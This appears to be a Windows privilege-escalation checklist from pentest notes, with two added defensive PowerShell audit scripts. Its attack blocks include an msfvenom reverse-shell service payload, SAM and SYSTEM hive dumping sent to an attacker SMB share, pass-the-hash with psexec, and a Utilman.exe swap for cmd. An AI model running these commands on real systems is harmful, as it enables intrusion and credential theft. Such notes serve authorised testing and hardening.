Checklist - Windows

Unattended install remnants

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows a single operating system image to be deployed to several hosts over the network. These installations are referred to as unattended installations because they require no user interaction. They do, however, require an administrator account to perform the initial setup, and its credentials may end up stored on the machine in the following locations:

Installed software registry saved credentials

Putty

Grab putty creds

Powershell + Cmd history

Whenever a user runs a command in PowerShell, it is appended to a history file that keeps a record of past commands. This is useful for quickly repeating commands you have used before. If a user runs a command that includes a password directly on the PowerShell command line, that password can later be retrieved from the history.

Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system.

Scheduled Tasks

Looking into the scheduled tasks on the target system, you may find a task that has either lost its binary or runs a binary you can modify.

If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the other user, resulting in a simple privilege escalation.

AlwaysInstallElevated

Windows Installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts them. However, they can be configured to run with elevated privileges from any user account (even unprivileged ones). This could allow an attacker to generate a malicious MSI file that runs with administrative privileges.

Services

Windows services are managed by the Service Control Manager (SCM). The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service and generally providing a way to configure services.

Each service on a Windows machine has an associated executable that the SCM runs whenever the service is started. It is important to note that service executables implement special functions in order to communicate with the SCM, so not just any executable can be started as a service successfully. Each service also specifies the user account under which it will run.

Location: HKLM\SYSTEM\CurrentControlSet\Services\

Weak permissions

```
# Check if any service has weak permissions
# Print details about the service, such as its linked executable
sc qc vulnerable-service
# Check the linked executable's permissions; hopefully we can modify it (M)
icacls "C:\Program Files\somecompany\Service.exe"
# If we can modify an executable linked to a service, create a malicious exe-service executable and upload it
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=6969 -f exe-service -o malicious-svc.exe
# Make a backup of the old service executable, then copy the malicious one to the original location
copy "C:\Program Files\somecompany\Service.exe" C:\temp\Service.backup
copy C:\temp\malicious-svc.exe "C:\Program Files\somecompany\Service.exe"
# Restart the service (if able)
sc stop vulnerable-service
sc start vulnerable-service

# Check for an unquoted BINARY_PATH_NAME in a service
sc qc "some mtg service"
# If BINARY_PATH_NAME is not double-quoted, we might be able to hijack it, e.g.:
#   BINARY_PATH_NAME : C:\MyPrograms\Magic The Gathering\bin\mtg.exe
# Windows tries each space-delimited prefix as an executable before the real one, so try every possible location:
#   C:\MyPrograms\Magic.exe, C:\MyPrograms\Magic The.exe
```
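An added hardening audit (not part of the original checklist) that covers the AlwaysInstallElevated, weak service-binary permission and unquoted service path checks above from the defender's side: it reports each misconfiguration so it can be fixed before it is abused. The list of low-privileged principals and the output wording are my own assumptions; no names or paths are taken from the page's example host.

```powershell
# Added audit example: read-only, run from an elevated PowerShell prompt.

# 1. AlwaysInstallElevated: MSIs run as SYSTEM only when BOTH values are 1.
$aie = foreach ($hive in 'HKLM', 'HKCU') {
    (Get-ItemProperty -Path "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer" `
        -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
}
if (@($aie | Where-Object { $_ -eq 1 }).Count -eq 2) {
    Write-Warning 'AlwaysInstallElevated is 1 in HKLM and HKCU: any user can install an MSI as SYSTEM. Set both to 0.'
}

# Principals that must never be able to write a service binary (assumed list, extend as needed).
$lowPriv   = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, TakeOwnership, ChangePermissions'

foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $cmd = $svc.PathName
    if (-not $cmd) { continue }

    # Split the executable off its arguments, remembering whether it was quoted.
    if     ($cmd -match '^"([^"]+)"')  { $exe = $Matches[1]; $quoted = $true }
    elseif ($cmd -match '^(.+?\.exe)') { $exe = $Matches[1]; $quoted = $false }
    else   { continue }

    # 2. Unquoted path with spaces: CreateProcess tries every space-delimited prefix first,
    #    so a writable parent directory lets anyone plant the binary that actually runs.
    if (-not $quoted -and $exe -match '\s') {
        Write-Warning "$($svc.Name): unquoted path with spaces -> $cmd"
        Write-Host    "    fix: sc.exe config $($svc.Name) binPath= ... with the executable in double quotes"
    }

    # 3. Binary writable by a low-privileged principal: it can be swapped for another exe-service.
    if (Test-Path -LiteralPath $exe -PathType Leaf) {
        foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                $lowPriv -contains $ace.IdentityReference.Value -and
                (($ace.FileSystemRights -band $writeMask) -ne 0)) {
                Write-Warning "$($svc.Name) runs as '$($svc.StartName)' but $exe is writable by $($ace.IdentityReference)"
            }
        }
    }
}
```

Each warning names the service and the account it runs as, so findings can be prioritised by the privilege an attacker would gain.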

```
# Check current privileges
whoami /priv

########################
# SeBackup / SeRestore privileges
########################
# With these privileges we can dump the registry / credentials
# Dump the registry hives for local analysis
reg save hklm\system C:\Users\victim\system.hive
reg save hklm\sam C:\Users\victim\sam.hive

# Start an SMB server on the attacker machine to transfer the files
# attacker:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -username victim -password victimpassword public share
# victim:
copy C:\Users\victim\system.hive \\attacker-ip\public\
copy C:\Users\victim\sam.hive \\attacker-ip\public\

# Parse the hives
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

# If the dump succeeded, start cracking the hashes or pass-the-hash
# Try psexec
python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3h73h:1238d8 Administrator@<target-ip>
```

```
########################
# SeTakeOwnership privileges
########################
# With this privilege we can take ownership of any object (files, registry keys, etc.)
# A nice trick is to replace a system file such as utilman.exe, which can be launched from the login screen
takeown /f C:\Windows\System32\Utilman.exe
# Owning a file does not mean having permissions on it, but we can grant ourselves permissions after taking ownership
icacls C:\Windows\System32\Utilman.exe /grant our-current-user:F
# Now that we have ownership and permissions, replace it with a malicious exe or just cmd
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
# You can now lock or restart and open the ease-of-access menu to get a shell
```
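An added integrity check (not part of the original checklist) for the Utilman.exe replacement just described, written for the defender: it looks for the traces the takeown/icacls/copy sequence leaves behind. The expected TrustedInstaller owner and the version-resource comparison rely on how stock Windows binaries are shipped; the remediation hint is my own suggestion.

```powershell
# Added detection example: read-only, run from an elevated PowerShell prompt.
$target   = Join-Path $env:SystemRoot 'System32\Utilman.exe'
$findings = New-Object System.Collections.Generic.List[string]

$file = Get-Item -LiteralPath $target
$acl  = Get-Acl  -LiteralPath $target

# 1. takeown /f changes the owner; stock System32 binaries are owned by TrustedInstaller.
if ($acl.Owner -ne 'NT SERVICE\TrustedInstaller') {
    $findings.Add("owner is '$($acl.Owner)', expected NT SERVICE\TrustedInstaller")
}

# 2. icacls /grant user:F adds a write-capable ACE; only TrustedInstaller should hold one.
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, TakeOwnership, ChangePermissions'
foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -eq 'Allow' -and
        $ace.IdentityReference.Value -ne 'NT SERVICE\TrustedInstaller' -and
        (($ace.FileSystemRights -band $writeMask) -ne 0)) {
        $findings.Add("$($ace.IdentityReference) holds $($ace.FileSystemRights)")
    }
}

# 3. A cmd.exe copied over Utilman.exe keeps cmd's own version resource (OriginalFilename 'Cmd.Exe').
$orig = $file.VersionInfo.OriginalFilename
if (-not $orig -or $orig -ine $file.Name) {
    $findings.Add("version resource says OriginalFilename='$orig' but the file is '$($file.Name)'")
}

# 4. A custom malicious binary is usually unsigned; Microsoft binaries verify (embedded or catalog signature).
$sig = Get-AuthenticodeSignature -FilePath $target
if ($sig.Status -ne 'Valid') { $findings.Add("Authenticode status $($sig.Status)") }

if ($findings.Count) {
    Write-Warning "$target shows signs of tampering:"
    $findings | ForEach-Object { Write-Warning "  - $_" }
    Write-Warning 'Restore the file from a trusted source (e.g. sfc /scannow) and review who took ownership and when.'
} else {
    Write-Host "${target}: owner, ACL, version resource and signature look untouched."
}
```

Check 3 is the one that catches the exact swap on this page, since a copied cmd.exe is still a validly signed Microsoft binary and passes check 4.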

```
########################
# SeImpersonate / SeAssignPrimaryToken
########################
# https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
# Tool: https://github.com/antonioCoco/RogueWinRM
```
